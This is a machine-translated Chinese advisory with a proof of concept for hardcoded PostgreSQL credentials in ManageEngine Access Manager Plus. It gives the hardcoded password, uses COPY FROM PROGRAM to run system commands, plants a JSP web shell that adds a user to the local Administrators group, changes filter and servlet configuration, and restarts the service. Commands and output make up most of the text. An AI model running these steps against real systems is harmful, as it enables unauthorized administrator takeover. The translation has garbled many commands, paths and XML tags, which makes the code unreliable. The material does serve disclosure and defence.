Zoho ManageEngine披露硬编码的凭证

静态凭证PostgreSQL中存在数据用于ManageEngine Access Manager + (AMP)构建4309。这些凭证可以允许一个恶意的演员来修改配置数据,将升级他们的权限较低权限的用户管理用户。

PostgreSQL数据库服务器用于安保系统帐户下运行:

C:\Program Files\ ManageEngine \ \ pgsql \本>设置PGPASSWORD = Stonebraker&& psql - h 127.0.0.1: 4567 - p - d AMP - u postgres q
AMP = #删除表如果存在cmd_exec;
注意:表“cmd_exec”并不存在,跳过
AMP = #创建表cmd_exec (cmd_output文本);
AMP = #复制cmd_exec从程序的whoami /用户/组(csv格式,分隔符E ' \ t ');
AMP = # select * from cmd_exec;


用户信息
- - - - - - - - - - - - - - - - -

用户名SID
= = = = = = = = = = = = = = = = = = = = = = = = = = =
nt权威S-1-5-18 \系统


组信息
- - - - - - - - - - - - - - - - - -

组名称类型SID属性
= = = = = = = = = = = = = = = = = = = = = = = = = = = = == = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = == = = = = = = = = = = = = = = = = = = =
内装式\管理员别名s - 1 - 5 - 32 - 544组仅用于否认
每个人都知名组S-1-1-0强制性组,默认启用,启用组
NT AUTHORITY)著名\经过身份验证的用户组S-1-5-11强制性组,默认启用,启用组
强制性标签\系统强制级别标签s - 1 - 16 - 16384
(18行)


AMP = #

如上所示,系统账户属于本地Administrators组,但其成员检查时才会被拒绝访问ace,适用于SID s - 1 - 5 - 32 - 544。令ace的SID被忽略。这意味着系统没有权限授予本地Administrators组。

因此,操作,比如添加一个较低权限用户本地Administrators组会失败(拒绝访问):

C:\Program Files\ ManageEngine \ \ pgsql \本>设置PGPASSWORD = Stonebraker&& psql - h 127.0.0.1: 4567 - p - d AMP - u postgres q
AMP = #删除表如果存在cmd_exec;
注意:表“cmd_exec”并不存在,跳过
AMP = #创建表cmd_exec (cmd_output文本);
AMP = #复制cmd_exec从项目的净本地群组管理员user1 /添加> c: \ \ Windows \ \ Temp \ \。txt 2 > & 1”;
错误:程序“网络本地群组管理员user1 /添加> C: \ \ Windows \ \ Temp \ \。txt 2 > & 1”失败了
细节:子进程退出,退出码2
AMP = #复制cmd_exec从“C: \ \ Windows \ \ Temp \ \ out.txt”;
AMP = # select * from cmd_exec;
cmd_output
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
发生了系统错误5。

访问被拒绝。

(4行)


AMP = #

然而,ManageEngine Access Manager + (AMP) Windows服务(Tomcat java.exe)是用管理员权限运行。低权限用户运行命令作为PostgreSQL服务器可以改变放大器配置文件并重新启动安保服务。用户可以删除一个JSP文件AMP webapp根,因为它要执行安全上下文下的安保服务。这允许用户添加本地Administrators组。

概念验证
创建一个低权限的Windows用户(即。user1,加入用户和远程桌面用户)

(即创建一个JSP文件。test.jsp)补充道,低权限用户管理员组
< % Runtime.getRuntime ()。exec (cmd / c \“净本地群组管理员user1 /添加\ " ");% >

作为user1登录AMP Windows主机并验证user1并不是一个管理员组的成员
C:\Users\ user1 >净用户user1 |中管理员
C:\Users\ user1 >

登录到本地PostgreSQL服务器使用硬编码的凭证
C:\Users\ user1 > cd C:\Program Files\ ManageEngine \ \ pgsql \本
C:\Program Files\ ManageEngine \ \ pgsql \本>设置PGPASSWORD = Stonebraker&& psql - h 127.0.0.1: 4567 - p - d - u postgres

将JSP文件复制到AMP webapp根上下文下的系统账户
AMP = #删除表如果存在cmd_exec;
AMP = #创建表cmd_exec (cmd_output文本);
AMP = # cmd_exec从程序的副本复制c: \ \ user1 \用户测试。jsp“C: \ Program Files \ ManageEngine \ \webapps \ Amp \”;

security-common-onpremise副本。xml用户的主目录
AMP = #复制cmd_exec从程序的副本“C: \ PROGRAM Files \ ManageEngine \ AMP \ conf \security-common-onpremise。xml用户“c: \ \ user1 \ ';

添加以下URL入口在security-common-onpremise.xml < URL >元素下。这是为了确保/测试。jsp SecurityFilter不会阻塞。
< url路径= " /测试。jsp "描述= " "方法= ",post " / >

security-common-onpremise复制修改。xml回到它的位置
AMP = # cmd_exec从程序的副本复制c: \ \ user1 \安全——用户common-onpremise。xml“C: \ Program Files \ ManageEngine \ AMP \ conf \”的;

复制tomcat web。xml用户的主目录
AMP = #复制cmd_exec从程序的副本“C: \ PROGRAM Files \ ManageEngine \ AMP \ conf \网络。xml用户“c: \ \ user1 \ ';

添加以下配置< web >元素下web . xml。这允许/测试。jsp执行jsp servlet。
< servlet >
< < servlet-name > jsp / servlet -名称>
< servlet类>表示。jasper.servlet.JspServlet < /servlet类>
<初始化>
< param-name >叉< / param-name >
<参数值>假< / param -值>
< /初始化>
< load-on-startup > < /负载- 1启动>
< / servlet >
< servlet映射>
< < servlet-name > jsp / servlet -名称>
< url模式> < / url - * . jsp模式>
< / servlet映射>

复制修改web。xml回到它的位置
AMP = # cmd_exec从程序的副本复制c: \ \ user1 \ web用户。xml“C: \ Program Files \ ManageEngine \ AMP \ conf \”的;

重新启动AMP web服务,以便修改。xml和security-common-onpremise。xml可以生效
注意重启安保服务将PostgreSQL连接下跌,因为PostgreSQL服务器发起的安保服务
AMP = #从程序复制cmd_exec powershell。exe - command“Restart-Service amp force”;

等到安保服务重新启动通过检查https:// < amp-host >: 9292 /在一个web浏览器
执行/测试。jsp添加user1管理员
旋度滑雪的https:// < amp-host >: 9292 /测试。jsp的

下线user1并再次检查用户重新登录会员
C:\Users\ user1 >净用户user1 |中管理员
本地组成员*管理员*远程桌面用户

C:\Users\ user1 >